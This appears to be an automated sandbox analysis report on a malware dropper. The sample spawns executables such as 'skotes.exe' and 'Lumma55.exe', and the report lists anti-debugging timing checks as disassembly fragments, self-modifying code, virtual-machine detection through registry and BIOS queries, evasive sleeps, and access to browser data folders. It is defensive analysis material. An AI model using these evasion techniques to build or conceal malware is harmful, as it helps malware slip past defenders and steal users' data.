Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0AC5 second address: 51E0B14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 call 00007EFF1080EDE4h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 call 00007EFF1080EDDEh 0x00000015 push ecx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jmp 00007EFF1080EDE7h 0x0000001d popad 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0B14 second address: 51E0B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0B18 second address: 51E0B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0B1E second address: 51E0B5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, 8Bh 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-10h] 0x0000000b jmp 00007EFF112B4C27h 0x00000010 mov dword ptr fs:[00000000h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007EFF112B4C20h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0B5A second address: 51E0B60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0B60 second address: 51E0B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF112B4C1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0B71 second address: 51E0BE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b jmp 00007EFF1080EDDDh 0x00000010 mov eax, dword ptr [esi+10h] 0x00000013 jmp 00007EFF1080EDDEh 0x00000018 test eax, eax 0x0000001a jmp 00007EFF1080EDE0h 0x0000001f jne 00007EFF824EDF4Eh 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007EFF1080EDDEh 0x0000002c sbb ax, E2A8h 0x00000031 jmp 00007EFF1080EDDBh 0x00000036 popfd 0x00000037 mov di, cx 0x0000003a popad 0x0000003b sub eax, eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007EFF1080EDDEh 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0BE9 second address: 51E0C34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-20h], eax 0x0000000b jmp 00007EFF112B4C28h 0x00000010 mov ebx, dword ptr [esi] 0x00000012 jmp 00007EFF112B4C20h 0x00000017 mov dword ptr [ebp-24h], ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007EFF112B4C1Dh 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0C34 second address: 51E0C5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007EFF1080EDDDh 0x00000008 pop esi 0x00000009 mov ch, dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test ebx, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007EFF1080EDDFh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0C5D second address: 51E0C63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0C63 second address: 51E0C7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007EFF824EDDE8h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFF1080EDDAh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0C7D second address: 51E0C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0C83 second address: 51E0740 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF1080EDDDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp ebx, FFFFFFFFh 0x0000000e jmp 00007EFF1080EDDEh 0x00000013 jmp 00007EFF824EDDAAh 0x00000018 jne 00007EFF1080EDF9h 0x0000001a xor ecx, ecx 0x0000001c mov dword ptr [esi], ecx 0x0000001e mov dword ptr [esi+04h], ecx 0x00000021 mov dword ptr [esi+08h], ecx 0x00000024 mov dword ptr [esi+0Ch], ecx 0x00000027 mov dword ptr [esi+10h], ecx 0x0000002a mov dword ptr [esi+14h], ecx 0x0000002d mov ecx, dword ptr [ebp-10h] 0x00000030 mov dword ptr fs:[00000000h], ecx 0x00000037 pop ecx 0x00000038 pop edi 0x00000039 pop esi 0x0000003a pop ebx 0x0000003b mov esp, ebp 0x0000003d pop ebp 0x0000003e retn 0004h 0x00000041 nop 0x00000042 pop ebp 0x00000043 ret 0x00000044 add esi, 18h 0x00000047 pop ecx 0x00000048 cmp esi, 00FC56A8h 0x0000004e jne 00007EFF1080EDC0h 0x00000050 push esi 0x00000051 call 00007EFF1080F643h 0x00000056 push ebp 0x00000057 mov ebp, esp 0x00000059 push dword ptr [ebp+08h] 0x0000005c call 00007EFF14A72506h 0x00000061 mov edi, edi 0x00000063 jmp 00007EFF1080EDE7h 0x00000068 xchg eax, ebp 0x00000069 jmp 00007EFF1080EDE6h 0x0000006e push eax 0x0000006f jmp 00007EFF1080EDDBh 0x00000074 xchg eax, ebp 0x00000075 push eax 0x00000076 push edx 0x00000077 jmp 00007EFF1080EDE5h 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0225 second address: 51E0239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, EFh 0x00000005 mov ecx, 2A45B289h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0239 second address: 51E023F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E023F second address: 51E026E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007EFF112B4C1Ch 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E026E second address: 51E0273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 51E0273 second address: 51E029F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007EFF112B4C27h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 58F15D second address: 58F161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 58F161 second address: 58F187 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFF112B4C16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007EFF112B4C1Dh 0x00000015 popad 0x00000016 jnl 00007EFF112B4C1Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 58F187 second address: 58E9A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 cld 0x00000007 push dword ptr [ebp+122D1675h] 0x0000000d cmc 0x0000000e call dword ptr [ebp+122D18B0h] 0x00000014 pushad 0x00000015 jmp 00007EFF1080EDDAh 0x0000001a xor eax, eax 0x0000001c jmp 00007EFF1080EDDEh 0x00000021 mov edx, dword ptr [esp+28h] 0x00000025 mov dword ptr [ebp+122D1915h], ebx 0x0000002b sub dword ptr [ebp+122D1915h], ebx 0x00000031 mov dword ptr [ebp+122D372Eh], eax 0x00000037 mov dword ptr [ebp+122D1915h], esi 0x0000003d mov esi, 0000003Ch 0x00000042 pushad 0x00000043 mov bx, ax 0x00000046 mov dword ptr [ebp+122D1915h], edi 0x0000004c popad 0x0000004d add esi, dword ptr [esp+24h] 0x00000051 jmp 00007EFF1080EDDDh 0x00000056 jmp 00007EFF1080EDE2h 0x0000005b lodsw 0x0000005d jmp 00007EFF1080EDDDh 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 jno 00007EFF1080EDDDh 0x0000006c pushad 0x0000006d push edi 0x0000006e jmp 00007EFF1080EDE7h 0x00000073 pop ecx 0x00000074 stc 0x00000075 popad 0x00000076 mov ebx, dword ptr [esp+24h] 0x0000007a pushad 0x0000007b js 00007EFF1080EDDCh 0x00000081 mov dword ptr [ebp+122D1BD8h], esi 0x00000087 call 00007EFF1080EDDCh 0x0000008c pop esi 0x0000008d popad 0x0000008e push eax 0x0000008f push ebx 0x00000090 pushad 0x00000091 push eax 0x00000092 push edx 0x00000093 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 701E99 second address: 701E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 701E9E second address: 701EA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 701EA3 second address: 701EB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jbe 00007EFF112B4C16h 0x0000000c popad 0x0000000d pushad 0x0000000e jnp 00007EFF112B4C16h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 6ED5EA second address: 6ED5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFF1080EDD6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 7012FE second address: 701305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 701305 second address: 70131B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF1080EDE0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 70173E second address: 701747 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 704D3E second address: 704D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 704D44 second address: 704D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 704D48 second address: 704D6C instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFF1080EDD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f je 00007EFF1080EDD6h 0x00000015 jne 00007EFF1080EDD6h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jns 00007EFF1080EDD6h 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 704E88 second address: 704F01 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 ja 00007EFF112B4C16h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 5E3544D5h 0x00000013 sub ch, FFFFFFF2h 0x00000016 push 00000003h 0x00000018 mov edi, dword ptr [ebp+122D36BAh] 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 jns 00007EFF112B4C1Ch 0x00000027 pop edi 0x00000028 push 00000003h 0x0000002a mov dword ptr [ebp+122D1951h], esi 0x00000030 push 60775CD8h 0x00000035 jng 00007EFF112B4C1Ah 0x0000003b push ebx 0x0000003c push ebx 0x0000003d pop ebx 0x0000003e pop ebx 0x0000003f add dword ptr [esp], 5F88A328h 0x00000046 xor cx, 4FC8h 0x0000004b lea ebx, dword ptr [ebp+12449C77h] 0x00000051 and di, 4F48h 0x00000056 mov edx, ecx 0x00000058 xchg eax, ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007EFF112B4C28h 0x00000060 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 70510D second address: 705111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 6FAD1E second address: 6FAD39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF112B4C27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 6FAD39 second address: 6FAD55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF1080EDE8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 6FAD55 second address: 6FAD5B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 724262 second address: 724276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007EFF1080EDDEh 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 72473C second address: 724746 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 724746 second address: 72474A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 72474A second address: 72474E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 72474E second address: 724754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe RDTSC instruction interceptor: First address: 724754 second address: 72475A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: FCE90A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: FCEA26 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 119170C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 117B73D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 58E90A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 58EA26 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 75170C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 73B73D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Special instruction interceptor: First address: 7BC8B5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Special instruction interceptor: First address: 7BC9A0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Special instruction interceptor: First address: 99757F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Special instruction interceptor: First address: 9815EF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe Special instruction interceptor: First address: 9FE4AD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Special instruction interceptor: First address: A1CD26 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Special instruction interceptor: First address: A1CC99 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Special instruction interceptor: First address: BE99D6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Special instruction interceptor: First address: 10FFD3C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Special instruction interceptor: First address: 12AE2C5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Special instruction interceptor: First address: 12B7A0E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008282001\80c14d0add.exe Special instruction interceptor: First address: 133CA2B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Special instruction interceptor: First address: 10DE18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Special instruction interceptor: First address: 2CD978 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Special instruction interceptor: First address: 10DD44 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Special instruction interceptor: First address: 336A45 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Special instruction interceptor: First address: 644DE18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Special instruction interceptor: First address: 660D978 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Special instruction interceptor: First address: 644DD44 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Special instruction interceptor: First address: 6676A45 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe Special instruction interceptor: First address: 8ECE25 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe Special instruction interceptor: First address: 94F81D instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Memory allocated: 4C40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Memory allocated: 4DB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Memory allocated: 6DB0000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1008285001\d199ee6df3.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05230C04 rdtsc 0_2_05230C04
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Window / User API: threadDelayed 465
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4408 Thread sleep time: -44022s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3220 Thread sleep count: 41 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3220 Thread sleep time: -82041s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3752 Thread sleep count: 285 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3752 Thread sleep time: -8550000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3752 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe TID: 7588 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe TID: 7584 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe TID: 7776 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe TID: 7784 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe TID: 7852 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe TID: 7868 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe TID: 5956 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe TID: 5816 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\1008276001\Lumma55.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1008283001\67baab2438.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008284001\3f81b82714.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Comms Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Google Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Packages Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\Mozilla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008281001\8e3ce0163b.exe File opened: C:\Users\user\AppData\Local\PeerDistRepub Jump to behavior
Source: file.exe, file.exe, 00000000.00000002.1727498803.0000000001149000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, skotes.exe, 00000001.00000002.1757170082.0000000000709000.00000040.00000001.01000000.00000007.sdmp, Lumma55.exe, Lumma55.exe, 00000006.00000002.2660821072.000000000094F000.00000040.00000001.01000000.00000009.sdmp, 80c14d0add.exe, 80c14d0add.exe, 00000009.00000002.2664164929.0000000001290000.00000040.00000001.01000000.0000000B.sdmp, 8e3ce0163b.exe, 8e3ce0163b.exe, 0000000A.00000002.2968067630.0000000000BA6000.00000040.00000001.01000000.0000000A.sdmp, 80c14d0add.exe, 00000019.00000002.2836982350.0000000001290000.00000040.00000001.01000000.0000000B.sdmp, 3f81b82714.exe, 0000001D.00000001.2783091362.000000000028A000.00000080.00000001.01000000.00000014.sdmp, 8e3ce0163b.exe, 00000021.00000002.2964342181.0000000000BA6000.00000040.00000001.01000000.0000000A.sdmp, d199ee6df3.exe, 00000022.00000002.2967919469.00000000008A8000.00000040.00000001.01000000.00000019.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
